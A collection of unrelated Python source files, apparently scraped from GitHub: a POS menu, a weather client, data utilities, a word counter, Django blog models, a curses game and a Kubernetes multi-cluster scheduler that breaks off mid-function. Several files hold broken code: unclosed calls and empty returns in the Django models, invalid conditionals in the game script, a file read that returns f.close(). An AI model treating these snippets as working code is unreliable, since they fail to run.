#### File: 007rohitSaini/commandline_pos/ ```python import connect import getpass # getpass is already included in base python module ,so no need to install it thorugh pip def main(): # print menu help = ''' Enter Signup to create new login account. Enter ShowStock to Show stock database. Enter ShowLogin to Display Login credentials. Enter update to edit stock table. Enter sale to show Sale Table. Enter Help to see this tect again. ''' print(help) # get continous input while true while True: init = input(':-> ') if init.lower() == 'signup': connect.sign() elif init.lower() == 'showstock': connect.show_db() elif init.lower() == 'showlogin': connect.show_login() elif init.lower() == 'sale': connect.show_sale() elif init.lower() == 'update': connect.update_Stock() elif init.lower() == 'help': print(help) elif init.lower() == 'close': break else: print('Input error, Try again') if __name__ == '__main__': main() ```
{ "source": "007root/weather", "score": 3 }
#### File: 007root/weather/ ```python import csv import requests from datetime import datetime TOKEN = '' CITY_CSV = 'city.csv' SKYCON = { "CLEAR_DAY": "晴天", "CLEAR_NIGHT": "晴夜", "PARTLY_CLOUDY_DAY": "多云", "PARTLY_CLOUDY_NIGHT": "多云", "CLOUDY": "阴", "RAIN": "雨", "SNOW": "雪", "WIND": "风", "HAZE": "雾霾沙尘"} WIND_SPEED = { 0: ["1", "无风", "烟直上"], 1: ["1-5", "软风", "烟稍斜"], 2: ["6-11", "轻风", "树叶响"], 3: ["12-19", "微风", "树枝晃"], 4: ["20-28", "和风", "灰尘起"], 5: ["29-38", "清风", "水起波"], 6: ["39-49", "强风", "大树摇"], 7: ["50-61", "劲风", "步难行"], 8: ["62-74", "大风", "树枝折"], 9: ["75-88", "烈风", "烟囱毁"]} def get_location(province, city=None, zone=None): with open(CITY_CSV, 'r') as csvfile: cityread = csv.reader(csvfile) flag = 0 ret = None for i in cityread: if province in i[0]: flag += 1 if flag == 1: ret = i if city and city in i[1]: if zone: if zone in i[2]: ret = i else: continue else: ret = i else: continue assert ret, "Not found %s. Please enter again" % province return ret def get_wind_speed(speed): if speed <= 1: return WIND_SPEED.get(0) else: WIND_SPEED.pop(0) for k,v in WIND_SPEED.items(): start, end = v[0].split('-') if int(start) <= int(speed) <= int(end): v.insert(0,k) return v def get_realtime_weather(province, city=None, zone=None): """ get_weather(province, city=None, zone=None) """ LOCATION = get_location(province, city, zone) coordinate = ','.join(LOCATION[-2:]) API = '' % (TOKEN, coordinate) weather = requests.get(API) weather = weather.json() server_time = float(weather.get('server_time')) server_time = datetime.fromtimestamp(server_time) speed = weather.get('result').get('wind').get('speed') skycon = SKYCON.get(weather.get('result').get('skycon')) temperature = weather.get('result').get('temperature') ultraviolet = weather.get('result').get('ultraviolet').get('desc') region = LOCATION[:2] speed_msg = get_wind_speed(speed) result = """ %s 北京时间: %s 当前天气: %s 紫外线 : %s 当前气温: %s℃ 当前风速: %skm/h, %s级, %s""" % (','.join(region), server_time, skycon, ultraviolet, temperature, speed, speed_msg[0], ','.join(speed_msg[-2:])) return result def get_forecast_weather(province, city=None, zone=None): """ get_weather(province, city=None, zone=None) """ LOCATION = get_location(province, city, zone) coordinate = ','.join(LOCATION[-2:]) API = '' % coordinate weather = requests.get(API) weather = weather.json() server_time = float(weather.get('server_time')) server_time = datetime.fromtimestamp(server_time) daily = weather.get('result').get('daily') speed = daily.get('wind')[0].get('avg').get('speed') skycon = SKYCON.get(daily.get('skycon')[0].get('value')) temperature = daily.get('temperature')[0] temp_avg = temperature.get('avg') temp_min = temperature.get('min') temp_max = temperature.get('max') ultraviolet = daily.get('ultraviolet')[0].get('desc') pm25 = daily.get('pm25')[0].get('max') sun = daily.get('astro')[0] sun_set = sun.get('sunset').get('time') sun_rise = sun.get('sunrise').get('time') region = LOCATION[:2] speed_msg = get_wind_speed(speed) result = """北京时间: %s %s 明天天气概况 日出: %s 日落: %s 天气: %s pm2.5 : %s 紫外线 : %s 气温: 最高 %s℃ 最低 %s℃ 平均 %s℃ 风速: %skm/h, %s级, %s""" % (server_time, ','.join(region), sun_rise, sun_set, skycon, pm25, ultraviolet, temp_max, temp_min, temp_avg, speed, speed_msg[0], ','.join(speed_msg[-2:])) return result if __name__ == '__main__': the_weather = get_realtime_weather('北京', '朝阳') print(the_weather) ```
{ "source": "007sya/Project2021", "score": 3 }
#### File: utils/download_data/ ```python import os from typing import List import pandas as pd from utils.download_data import data_dtypes as dtypes from utils.download_data import download_safegraph_data from utils.file_utils import file_type from utils.path_utils import path_utils, paths def get_brand_info_dataset(): for f in path_utils.list_files_recursively(paths.brand_info): df = pd.read_csv(f) return df def get_core_poi_by_city(city, region=None, save_data=True): file_name = os.path.join(paths.processed_datasets, city, "core_poi.csv") if os.path.isfile(file_name): return pd.read_csv(file_name, encoding="utf-8") chunks = [] for f in path_utils.list_files_recursively(paths.core_poi): for chunk in pd.read_csv(f, chunksize=10_000): city = "Houston" region = "TX" chunk = chunk[chunk["city"] == city] if region != None: chunk = chunk[chunk["region"] == region] chunks.append(chunk) final_df = pd.concat(chunks) if save_data: path_utils.create_dir_if_necessary(file_name) final_df.to_csv(file_name, encoding="utf-8", index=False) return final_df def filter_census_df(path: str, columns: List[str], cbgs: List[str]): """ Filters census .csv given the columns and the cbgs """ dfs = [] # read the file per parts because it is 1gb large for chunk in pd.read_csv(path, encoding="utf-8", chunksize=10000, dtype=dtypes.census_dtypes): chunk["census_block_group"] = (chunk["census_block_group"] .astype(int).astype(str)) chunk = chunk[chunk["census_block_group"].isin(cbgs)] chunk = chunk[columns] dfs.append(chunk.copy()) # concat the filtered chunks return pd.concat(dfs) def get_census_metadata(): files = [f for f in path_utils.list_files_recursively(paths.open_census_dir) if file_type.is_census_metadata(f)] for file in files: if "description" in file: break return pd.read_csv(file) def get_lastest_home_pannel_summary(cbgs=None, donwload_most_recent=True): if donwload_most_recent: path = download_safegraph_data.download_lastest_home_pannel_summary() if cbgs is not None: return filter_census_df(path, ["census_block_group", "number_devices_residing"], cbgs) return pd.read_csv(path, encoding="utf-8") # %% ``` #### File: utils/list_utils/ ```python from utils.path_utils import path_utils def listify(list_or_value): """ Given a list or a value transforms it to a list Arguments: list_or_value (str or list): List or a value Returns: A list """ if isinstance(list_or_value, list): return list_or_value else: return [list_or_value] def unlistify(list_:list): """ Given a list it returns the list or the value if the length is 1 Arguments: list_ (list): List of values Returns: A list if the length is greater than 1 if not returns the first element """ if len(list_) == 1: return list_[0] else: return list_ ```
{ "source": "007vasy/JDP-WordCount", "score": 4 }
#### File: 007vasy/JDP-WordCount/ ```python import os import sys import re from docopt import docopt def openFileAndReadIn(fileName): text = "" try: f = open(fileName, 'r') except IOError: print("ERROR Could not read file:{}".format(fileName)) sys.exit() with f: text = f.close() return text def cleanTextAndMakeAList(text): text = re.sub('[^a-zA-Z]+', ' ', text) text = text.lower() return text.split() def countWordsFreqAndReturnListOfTuples(list_of_words): freq_counter = {} for w in list_of_words: if w not in freq_counter: freq_counter[w] = 1; else: freq_counter[w] += 1 freq_of_words = [] for key,val in freq_counter.items(): freq_of_words.append((val,key)) return freq_of_words def filterListOfWords(freq_of_words,count_threshold,stop_words): temp_list = [] if count_threshold != None: for (val, key) in freq_of_words: if val > count_threshold and key not in stop_words : temp_list.append((val,key)) else: temp_list = freq_of_words return temp_list def printOutWordFreqResult(filtered_freq_of_words): print("----") filtered_freq_of_words.sort(reverse=True) for (val, key) in filtered_freq_of_words: print('{}:{}'.format(key,val)) print("----") return def filePathFeedback(file_path): return("{} is the choosen file path".format(file_path)) def minCountFeedback(count_threshold): return("_{}_ is the threshold (Anything equal or less will be hidden)".format(count_threshold)) def excludedWordsFeedback(stop_words_file): return("{} is the file containing the excluded words".format(stop_words_file)) if __name__ == '__main__': print("####") arguments = docopt(__doc__, version='1.0') if arguments['<file_path>']: analysis_f_name = arguments['<file_path>'] print(filePathFeedback(analysis_f_name)) analysed_text = openFileAndReadIn(analysis_f_name) count_threshold = None stop_words_file = "" stop_words = [] if arguments['<count_threshold>']: count_threshold = int(arguments['<count_threshold>']) print(minCountFeedback(count_threshold)) if arguments['<stop_words_file>']: stop_words_file = arguments['<stop_words_file>'] print(excludedWordsFeedback(stop_words_file)) stop_words = openFileAndReadIn(stop_words_file).split() list_of_words = cleanTextAndMakeAList(analysed_text) freq_of_words = countWordsFreqAndReturnListOfTuples(list_of_words) filtered_freq_of_words = filterListOfWords(freq_of_words,count_threshold,stop_words) printOutWordFreqResult(filtered_freq_of_words) else: print(arguments) print("####") ```
{ "source": "007xuyang/Myblog", "score": 2 }
#### File: Myblog/blog/ ```python from django.db import models from django.utils import timezone from django.contrib.auth.models import User class Tag(models.Model): class Meta: app_label = 'blog' verbose_name = '标签' verbose_name_plural = '标签' name = models.CharField(max_length=40) def __str__(self): return class Category(models.Model): class Meta: app_label = 'blog' verbose_name = '分类目录' verbose_name_plural = '分类目录' name = models.CharField(max_length=40) def __str__(self): return class Post(models.Model): class Meta: app_label = 'blog' verbose_name = '文章' verbose_name_plural = '文章' # 作者 author = models.ForeignKey(User) # 标题 title = models.CharField(max_length=200) # 正文 text = models.TextField() # 标签 tags = models.ManyToManyField(Tag) # 分类目录 category = models.ForeignKey(Category) # 点击量 click = models.IntegerField(default=0) # 创建时间 created_date = models.DateTimeField( # 发布时间 published_date = models.DateTimeField(blank=True, null=True) def publish(self): self.published_date = def __str__(self): return self.title class Comment(models.Model): class Meta: app_label = 'blog' verbose_name = '评论' verbose_name_plural = '评论' author = models.CharField(max_length=20) email = models.EmailField() text = models.TextField() created_date = models.DateTimeField( post = models.ForeignKey(Post) def __str__(self): return '{0}: {1}'.format(, class Evaluate(models.Model): class Meta: app_label = 'blog' verbose_name = '评分' verbose_name_plural = '评分' ip = models.CharField(max_length=40) evaluate = models.IntegerField() post = models.ForeignKey(Post) def __str__(self): return '{0}: {1}'.format(self.ip, self.evaluate) class Page(models.Model): class Meta: app_label = 'blog' verbose_name = '页面' verbose_name_plural = '页面' # 作者 author = models.ForeignKey(User) # 标题 title = models.CharField(max_length=200) # 正文 text = models.TextField() # 排列顺序 porder = models.IntegerField(default=0) # 创建时间 created_date = models.DateTimeField( # 发布时间 published_date = models.DateTimeField(blank=True, null=True) def publish(self): self.published_date = def __str__(self): return self.title ```
{ "source": "00-ab/willows", "score": 4 }
#### File: willows/display/ ```python import curses import json import pprint TABLE_SYM_ONE = "I" TABLE_SYM_TWO = "*" TABLE_WIDTH = 41 TABLE_HEIGHT = 9 TABLE_COL_ONE = 20 def display( game ): """ Accepts a dance-game JSON object and passes it through the wrapper to _display, which does the real drawing. """ game = curses.wrapper( _display, game ) return game def _display( win, game0 ): stdscr = win game_data = json.loads( game0 ) curses.init_pair( 1, curses.COLOR_RED, curses.COLOR_BLACK ) curses.init_pair( 2, curses.COLOR_RED, curses.COLOR_BLACK ) curses.init_pair( 3, curses.COLOR_RED, curses.COLOR_BLACK ) curses.init_pair( 4, curses.COLOR_RED, curses.COLOR_BLACK ) choice = None while( choice != 'q' ): _print_stats( stdscr, 1, 1, "PLAYER ONE", game_data['0'] ) _print_stats( stdscr, 1, 51, "PLAYER TWO", game_data['1']) # insert map display here strng = "Turn " + str(game_data['game']['turn']) + ". Press any key." win.addstr( curses.LINES-1, 1, strng ) win.getch() for x in range(curses.COLS-1): win.addch( curses.LINES-1, x, " " ) # Get inputs win.addstr( curses.LINES-1, 1, "Player Zero, input move. " ) choice = chr( win.getch() ) game_data["0choice"] = choice for x in range(curses.COLS-1): win.addch( curses.LINES-1, x, " " ) win.addstr( curses.LINES-1, 1, "Player One, input move. " ) choice = chr( win.getch() ) game_data["1choice"] = choice for x in range(curses.COLS-1): win.addch( curses.LINES-1, x, " " ) game1 = json.dumps( game_data ) return game1 def _print_stats( win, y, x, title, player ): d = json.dumps( player ) win.addstr( y, x+1, title ) # Draw the border of the dable win.vline( y+1, x, TABLE_SYM_TWO, TABLE_HEIGHT ) win.vline( y+1, x+TABLE_COL_ONE, TABLE_SYM_TWO, TABLE_HEIGHT ) win.vline( y+1, x-1+TABLE_WIDTH, TABLE_SYM_TWO, TABLE_HEIGHT ) win.hline( y+1, x, TABLE_SYM_ONE, TABLE_WIDTH ) win.hline( y+3, x, TABLE_SYM_ONE, TABLE_WIDTH ) win.hline( y+5, x, TABLE_SYM_ONE, TABLE_WIDTH ) win.hline( y+7, x, TABLE_SYM_ONE, TABLE_WIDTH ) win.hline( y+9, x, TABLE_SYM_ONE, TABLE_WIDTH ) # Print the information win.addstr( y+2, x+2, 'EARTH/WILL' ) win.addstr( y+4, x+2, 'AIR/CALM' ) win.addstr( y+6, x+2, 'FIRE/PASSION' ) win.addstr( y+8, x+2, 'WATER/BALANCE' ) strng = "{0}/{1}".format(player['earth'], player['will'] ) win.addstr( y+2, x+2+TABLE_COL_ONE, strng ) strng = "{0}/{1}".format(player['air'], player['calm'] ) win.addstr( y+4, x+2+TABLE_COL_ONE, strng ) strng = "{0}/{1}".format(player['fire'], player['heat'] ) win.addstr( y+6, x+2+TABLE_COL_ONE, strng ) strng = "{0}/{1}".format(player['water'], player['balance'] ) win.addstr( y+8, x+2+TABLE_COL_ONE, strng ) if __name__ == '__main__': curses.wrapper(_display, game_temp) ``` #### File: willows/display/ ```python def read( script, flag ): """ For a script dilineated into sections headed by flags starting with "## ", finds the section with the passed-in flag and returns it. Ignores lines starting with single #s. See /script/example . """ for line in script: if line[0:2] == "## " and line[3:] == flag: text = [] toRead = line + 1 while not script[toRead][0:2] == "## ": #ignore comments if script[ toRead ][0] == "#": toRead += 1 #strip out blank lines at end of passages #(I like having those lines in cause it makes scripts pretty.) elif script[ toRead ] == "" and script[ toRead + 1 ][0:2] == "## " toRead += 1 #add true lines to output else: text.append( script[ toRead ] ) toRead += 1 return text def genFlagList( dance ): """ Accepts a dance object and returns a list of flags. This is akin to reading or parsing the condition of the dance game. The flags can then be read using read(). """ flagList = [] #parse distance distance = dance["game"]["d"] if distance = 0: flagList.append( "grapple" ) elif abs(distance) = 1: flagList.append( "shortRange" ) elif abs(distance) = 2: flagList.append( "midRange" ) elif abs(distance) = 3: flagList.append( "longRange") elif abs(distance) >= 4: flaglist.append( "far" ) def narrate( dance, script ): """ This accepts a dance, gets all relevant flags, and returns their corresponding scripts. In your games, you may wish to narrate flags in a certain order, so this may be too blunt for you. """ # in fact this might be too blunt for everyone... # how do I make it more versatile? narrative = [] flagList = genFlagList( dance ) for flag in flagList: narrative += read( script, flag ) return narrative ``` #### File: willows/tools/ ```python import sys # for sys. exit def choose( *args ): """ Accepts a list of options, then traps the player until it types one of them. """ # First prepare to print the list of options. string = "[" # args.append( "quit" ) for choice in enumerate(args): string += choice[1] if choice[0] != len(args) - 1: string += "/" string += "] " # Then get the choice. valid = 0 while valid == 0: player_choice = raw_input( string ) if player_choice in args: valid = 1 else: print( "Invalid response." ) if player_choice == "quit": sys.exit() return player_choice ``` #### File: willows/tools/ ```python import random import math def d( sides ): result = math.floor( random.random() * sides ) return result def die_test( sides, tries ): array = range( 0, sides) total = 0 for iterations in range( 0, tries ): roll = int( d( sides ) ) array( roll ) += 1 total += roll print( total ) print( array ) """ LlL """ ```
{ "source": "00ahui/mck8s", "score": 2 }
#### File: mck8s/multi-cluster-scheduler/ ```python from kubernetes import client, config from import ApiException from collections import defaultdict from pint import UnitRegistry from prometheus_api_client import PrometheusConnect import subprocess import operator import os import math import pandas as pd # Load k8s contexts config.load_kube_config() timeout = 30 ureg = UnitRegistry() Q_ = ureg.Quantity # Memory units ureg.define('kmemunits = 1 = [kmemunits]') ureg.define('Ki = 1024 * kmemunits') ureg.define('Mi = Ki^2') ureg.define('Gi = Ki^3') ureg.define('Ti = Ki^4') ureg.define('Pi = Ki^5') ureg.define('Ei = Ki^6') # cpu units ureg.define('kcpuunits = 1 = [kcpuunits]') ureg.define('m = 1/1000 * kcpuunits') ureg.define('k = 1000 * kcpuunits') ureg.define('M = k^2') ureg.define('G = k^3') ureg.define('T = k^4') ureg.define('P = k^5') ureg.define('E = k^6') def findPossibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request): nearest_clusters = findNearestClusters(cluster, original_clusters) possible_clusters = [] for c in nearest_clusters: check_possibility = checkClusterPossibility(c, app_cpu_request, app_memory_request) if check_possibility == True: possible_clusters.append(c) return possible_clusters def findEligibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request, replicas): print("Looking for clusters near to " + cluster) nearest_clusters = findNearestClusters(cluster, original_clusters) print("Nearest clusters ....", nearest_clusters) eligible_clusters = [] for c in nearest_clusters: check_eligibility = checkClusterEligibility(c, app_cpu_request, app_memory_request, replicas) if check_eligibility == True: eligible_clusters.append(c) return eligible_clusters def findPossibleClusters(clusters, app_cpu_request, app_memory_request): print("==================== Processing possible clusters ==========================") print(clusters) possible_clusters_list = [] for cluster in clusters: is_possible = checkClusterPossibility(cluster, app_cpu_request, app_memory_request) if is_possible == True: possible_clusters_list.append(cluster) else: possible_replacements = findPossibleReplacementClusters(cluster, clusters, app_cpu_request, app_memory_request) print("Replacement clusters ...............", possible_replacements) if len(possible_replacements) > 0: possible_clusters_list.append(possible_replacements[0]) return possible_clusters_list def findEligibleClusters(fogapp_locations, possible_clusters, override_replicas_new, fogapp_cpu_request, fogapp_memory_request): eligible_clusters = [] for cluster in possible_clusters: replicas = int(override_replicas_new[cluster]) # is_eligible = checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas) # The maximum number of replicas the cluster can host maximum_replicas = getMaximumReplicas(cluster, fogapp_cpu_request, fogapp_memory_request) if maximum_replicas > replicas: dict = {} dict['name'] = cluster dict['max_replicas'] = maximum_replicas dict['replicas'] = replicas dict['overflow'] = 0 eligible_clusters.append(dict) else: dict = {} dict['name'] = cluster dict['max_replicas'] = maximum_replicas dict['replicas'] = maximum_replicas dict['overflow'] = replicas - maximum_replicas eligible_clusters.append(dict) temp_list = [] for cluster in eligible_clusters: temp_list.append(cluster) print("Possible list of clusters and oveflow ....", temp_list) temp_list_2 = [] for cluster in temp_list: temp_list_2.append(cluster['name']) temp_list_3 = list(set(fogapp_locations + temp_list_2)) total_overflow = 0 for cluster in temp_list: total_overflow += cluster['overflow'] maximum_replicas = {} for cluster in temp_list: nearest_clusters = [] overflow = cluster['overflow'] # leftover = overflow print("Overflow from ", cluster, overflow) if overflow > 0: nearest_clusters = findNearestClusters(cluster, temp_list_3) print("List of nearest clusters ....", nearest_clusters) # else: # print("The cluster doesn't have overflow ....") # break # Distribute overflow to nearest clusters if len(nearest_clusters) > 0: for c in nearest_clusters: # print("Overflow .................", overflow) # if overflow > 0: maximum_replicas[c] = getMaximumReplicas(c, fogapp_cpu_request, fogapp_memory_request) print("Maximum replicas .....", maximum_replicas) for cluster in temp_list: nearest_clusters = [] overflow = cluster['overflow'] if overflow > 0: nearest_clusters = findNearestClusters(cluster, temp_list_3) # else: # break if len(nearest_clusters) > 0: for c in nearest_clusters: if cluster['overflow'] > 0: if maximum_replicas[c] == 0: cluster['overflow'] = cluster['overflow'] # break elif maximum_replicas[c] > cluster['overflow']: dict = {} dict['name'] = c dict['replicas'] = cluster['overflow'] dict['overflow'] = 0 eligible_clusters.append(dict) maximum_replicas[c] = maximum_replicas[c] - cluster['overflow'] cluster['overflow'] = 0 # break else: dict = {} dict['name'] = c dict['replicas'] = maximum_replicas[c] dict['overflow'] = 0 cluster['overflow'] = cluster['overflow'] - maximum_replicas[c] eligible_clusters.append(dict) maximum_replicas[c] = 0 eligible_clusters = (pd.DataFrame(eligible_clusters) .groupby(['name'], as_index=False) .agg({'replicas': 'sum', 'overflow': 'sum'}) .to_dict('r')) return eligible_clusters def checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas): print("==================== Processing eligible clusters ==========================") totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster) print("Available resources per node ..... for cluster", cluster, available_resources_per_node) count = 0 for node in available_resources_per_node: count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request)) print("Total number of replicas that can be scheduled ........... on", cluster, count) #if count > replicas: if count > replicas: return True else: return False def getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace): print("Compute allocatable capacity ..............") allocatable_capacity_per_node = computeAllocatableCapacity(cluster, app_name, app_namespace) count = 0 for node in allocatable_capacity_per_node: count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request)) return count def getMaximumReplicas(cluster, app_cpu_request, app_memory_request): print("Get the maximum number of replicas > 0 clusters can run ....") totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster) count = 0 for node in available_resources_per_node: count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request)) return count def computeAllocatableCapacity(cluster, app_name, namespace): total_allocatable_cpu = 0 total_allocatable_memory = 0 core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) allocatable_resources_per_node = [] try: for node in core_v1.list_node(_request_timeout=timeout).items: stats = {} node_name = allocatable = node.status.allocatable allocatabale_cpu = Q_(allocatable['cpu']).to('m') allocatable_memory = Q_(allocatable['memory']) total_allocatable_cpu += allocatabale_cpu total_allocatable_memory += allocatable_memory max_pods = int(int(allocatable["pods"]) * 1.5) field_selector = ("status.phase!=Succeeded,status.phase!=Failed," + "spec.nodeName=" + node_name) # Calculate for all ns node_cpu_request_all = 0 node_memory_request_all = 0 pods = core_v1.list_pod_for_all_namespaces(limit=max_pods, field_selector=field_selector).items cpureqs, memreqs = [], [] for pod in pods: for container in pod.spec.containers: res = container.resources reqs = defaultdict(lambda: 0, res.requests or {}) cpureqs.append(Q_(reqs["cpu"])) memreqs.append(Q_(reqs["memory"])) node_cpu_request_all += sum(cpureqs) node_memory_request_all += sum(memreqs) # Calculate for the namespace node_cpu_request_default = 0 node_memory_request_default = 0 # Get pods in the namespace pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods, field_selector=field_selector).items cpureqs, memreqs = [], [] for pod in pods: for container in pod.spec.containers: res = container.resources reqs = defaultdict(lambda: 0, res.requests or {}) cpureqs.append(Q_(reqs["cpu"])) memreqs.append(Q_(reqs["memory"])) node_cpu_request_default += sum(cpureqs) node_memory_request_default += sum(memreqs) # Exclude the resource request of other apps in the default namespace # Calculate for the namespace other apps node_cpu_request_default_other = 0 node_memory_request_default_other = 0 # Get pods of default ns pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods, field_selector=field_selector).items cpureqs, memreqs = [], [] for pod in pods: for container in pod.spec.containers: if != app_name: res = container.resources reqs = defaultdict(lambda: 0, res.requests or {}) cpureqs.append(Q_(reqs["cpu"])) memreqs.append(Q_(reqs["memory"])) node_cpu_request_default_other += sum(cpureqs) node_memory_request_default_other += sum(memreqs) dict = {} dict['name'] = node_name dict['cpu'] = float(allocatabale_cpu - node_cpu_request_all + node_cpu_request_default - node_cpu_request_default_other) * 1000 dict['memory'] = float(allocatable_memory - node_memory_request_all + node_memory_request_default - node_memory_request_default_other) / ( 1024 * 1024) allocatable_resources_per_node.append(dict) except: print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster) return allocatable_resources_per_node def compute_available_resources(cluster): total_allocatable_cpu = 0 total_allocatable_memory = 0 available_cpu = 0 available_memory = 0 total_cpu_request = 0 total_memory_request = 0 core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) available_resources_per_node = [] try: for node in core_v1.list_node(_request_timeout=timeout).items: stats = {} node_name = allocatable = node.status.allocatable allocatabale_cpu = Q_(allocatable['cpu']).to('m') allocatable_memory = Q_(allocatable['memory']) total_allocatable_cpu += allocatabale_cpu total_allocatable_memory += allocatable_memory max_pods = int(int(allocatable["pods"]) * 1.5) field_selector = ("status.phase!=Succeeded,status.phase!=Failed," + "spec.nodeName=" + node_name) node_cpu_request = 0 node_memory_request = 0 pods = core_v1.list_pod_for_all_namespaces(limit=max_pods, field_selector=field_selector).items cpureqs, memreqs = [], [] for pod in pods: for container in pod.spec.containers: res = container.resources reqs = defaultdict(lambda: 0, res.requests or {}) cpureqs.append(Q_(reqs["cpu"])) memreqs.append(Q_(reqs["memory"])) node_cpu_request += sum(cpureqs) node_memory_request += sum(memreqs) dict = {} dict['name'] = node_name dict['cpu'] = float(allocatabale_cpu - node_cpu_request) * 1000 dict['memory'] = float(allocatable_memory - node_memory_request) / (1024 * 1024) available_resources_per_node.append(dict) total_cpu_request += Q_(node_cpu_request) total_memory_request += Q_(node_memory_request).to('Ki') available_cpu = total_allocatable_cpu - total_cpu_request available_memory = total_allocatable_memory - total_memory_request available_cpu = float(str(available_cpu)[:-2]) available_memory = float(str(available_memory)[:-3]) except: print("Connection timeout after " + str(timeout) + " seconds on cluster " + cluster) return available_cpu, available_memory, available_resources_per_node def getPerNodeResources(cluster): perNodeCPU = 0 perNodeMemory = 0 client_cluster = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster)) try: nodes = client_cluster.list_node(_request_timeout=timeout) perNodeCPU = Q_(nodes.items[0].status.capacity['cpu']).to('m') perNodeMemory = Q_(nodes.items[0].status.capacity['memory']).to('Ki') perNodeCPU = float(str(perNodeCPU)[:-2]) perNodeMemory = float(str(perNodeMemory)[:-3]) except: print("Connection timeout after " + str(timeout) + " seconds to " + cluster) return perNodeCPU, perNodeMemory def checkClusterPossibility(cluster, app_cpu_request, app_memory_request): cluster_per_node_cpu, cluster_per_node_memory = getPerNodeResources(cluster) if app_cpu_request >= cluster_per_node_cpu or app_memory_request*1024 >= cluster_per_node_memory: return False else: return True def get_all_federation_clusters(): config.load_kube_config() api_instance = client.CustomObjectsApi() group = '' # str | The custom resource's group name version = 'v1beta1' # str | The custom resource's version namespace = 'kube-federation-system' # str | The custom resource's namespace plural = 'kubefedclusters' # str | The custom resource's plural name. For TPRs this would be lowercase plural kind. pretty = 'true' clusters = [] try: api_response = api_instance.list_namespaced_custom_object(group, version, namespace, plural, pretty=pretty, _request_timeout=timeout) for item in api_response['items']: clusters.append(item['metadata']['name']) except: print("Connection timeout after " + str(timeout) + " seconds to host cluster") return clusters def findNearestClusters(input_cluster, original_clusters): if isinstance(input_cluster, dict): input_cluster = input_cluster['name'] # TO DO: Specify cluster 0 config.load_kube_config() api = client.CoreV1Api() sorted_list = [] try: nodes = api.list_node(pretty=True, _request_timeout=timeout) nodes = [node for node in nodes.items if '' in node.metadata.labels] # get all addresses of the master addresses = nodes[0].status.addresses master_ip = [i.address for i in addresses if i.type == "InternalIP"][0] all_clusters = get_all_federation_clusters() # Don't consider cloud cluster for latency comparison # TO DO: Install and configure serf on cloud cluster fog_only_clusters = [] for cluster in all_clusters: if 'cloud' not in cluster: fog_only_clusters.append(cluster) candidate_clusters = list(filter(lambda x: x not in original_clusters, fog_only_clusters)) rtt_dict = {} #sorted_list = [] for c in candidate_clusters: command = 'serf rtt -rpc-addr=' + master_ip + ':7474 ' + c + ' ' + input_cluster result = subprocess.getoutput(command) # Need exception handling for the case when serf is not installed or available if 'Error' in result: print("There is error connecting to serf .........................................") result = float(result.split()[-2]) rtt_dict[c] = result s = sorted(rtt_dict.items(), key=lambda x: x[1], reverse=False) for k, v in s: sorted_list.append(k) print("Sorted list of clusters ....", sorted_list) except: print("Connection timeout after " + str(timeout) + " seconds to host cluster") return sorted_list def getFogAppLocationsByResource(clusters_qty): available_cpu = {} available_memory = {} all_clusters = get_all_federation_clusters() for cluster in all_clusters: available_cpu[cluster], available_memory[cluster] = compute_available_resources(cluster) sorted_dict = dict(sorted(available_memory.items(), key=operator.itemgetter(1), reverse=True)) if clusters_qty > len(all_clusters): clusters_qty = len(all_clusters) fogapp_locations = [] for key in sorted_dict: fogapp_locations.append(key) fogapp_locations = fogapp_locations[:clusters_qty] return fogapp_locations def getControllerMasterIP(): # TO DO: Specify cluster 0 config.load_kube_config() #api = client.CoreV1Api(api_client=config.new_client_from_config(context="cluster0")) api = client.CoreV1Api() master_ip = "" try: nodes = api.list_node(pretty=True, _request_timeout=timeout) nodes = [node for node in nodes.items if '' in node.metadata.labels] # get all addresses of the master addresses = nodes[0].status.addresses master_ip = [i.address for i in addresses if i.type == "InternalIP"][0] except: print("Connection timeout after " + str(timeout) + " seconds to host cluster") return master_ip def getFogAppLocations(app_name, app_namespace, app_cpu_request, app_memory_request, replicas, clusters_qty, placement_policy, mode): master_ip = getControllerMasterIP() prom_host = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_HOST", master_ip) prom_port = os.getenv("PROMETHEUS_DEMO_SERVICE_SERVICE_PORT", "30090") prom_url = "http://" + prom_host + ":" + prom_port # Creating the prometheus connect object with the required parameters pc = PrometheusConnect(url=prom_url, disable_ssl=True) # TO DO get all federation clusters except cloud all_clusters = get_all_federation_clusters() print("List of all clusters ................", all_clusters) fog_only_clusters = [] for cluster in all_clusters: if 'cloud' not in cluster: fog_only_clusters.append(cluster) print("Fog - only clusters .....", fog_only_clusters) cluster_network_receive = {} possible_clusters = [] for cluster in fog_only_clusters: if checkClusterPossibility(cluster, app_cpu_request, app_memory_request) == True: possible_clusters.append(cluster) print("List of possible clusters ..............", possible_clusters) eligible_clusters = [] if len(possible_clusters) == 0: eligible_clusters = [] else: for cluster in possible_clusters: # if checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas) == True: # eligible_clusters.append(cluster) # Get eligible clusters and their maximum capacity if mode == 'create': maximum_replicas = getMaximumReplicas(cluster, app_cpu_request, app_memory_request) elif mode == 'update': maximum_replicas = getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace) if maximum_replicas > 0: dict = {} dict['name'] = cluster dict['max_replicas'] = maximum_replicas eligible_clusters.append(dict) print("List of Eligible clusters ..............", eligible_clusters) if len(eligible_clusters) == 0: fogapp_locations = [] all_clusters = get_all_federation_clusters() for cluster in all_clusters: if 'cloud' in cluster: dict = {} dict['name'] = cluster dict['max_replicas'] = replicas * clusters_qty fogapp_locations.append(dict) return fogapp_locations else: sorted_eligible_clusters = [] if 